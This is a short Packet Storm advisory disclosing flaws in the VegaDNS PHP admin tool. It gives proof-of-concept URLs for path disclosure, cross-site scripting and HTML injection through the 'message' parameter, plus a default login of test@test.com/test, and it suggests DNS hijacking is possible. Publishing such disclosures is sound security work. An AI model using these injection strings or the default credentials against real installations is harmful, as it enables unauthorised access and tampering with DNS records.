VegaDNS suffers from a cross site scripting flaw, amongst others.
d2a1b335b860cf7775deef38a3410981VegaDNS XSS
-----------
Desc: Multiple vulns in VegaDNS
Risk: Medium to High
Discovered by : dyn0 (codeslag{hat}gmail.com) http://0xdeadface.co.uk
Project blurb : VegaDNS is a tinydns administration tool written in PHP
to allow easy administration of DNS records through a web browser.
Affected Versions : tested on version 0.8.1, version 0.9.8
1) PATH DISCLOSURE : index.php?VDNS_Sessid='
2) XSS : index.php?VDNS_Sessid=[sessid]&message=[some error msg]<iframe src="http://microsoft.com">
3) HTML INJECTION : index.php?VDNS_Sessid=[sessid]&message=[some error msg]<img src="http://goat.cx/hello.jpg">
4) GENERIC JS ALERT : index.php?VDNS_Sessid=[sessid]&message=[some error msg]<script>alert("0xdeadface");</script>
5) DEFAULT LOGIN : If the admins lazy (dumb?) then you might be able to login using user:test@test.com / pass:test
I'm lazy so this I've only tested the login page but I bet it wouldnt be too hard to hijack the dns
Hugs & Kisses dyn0
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!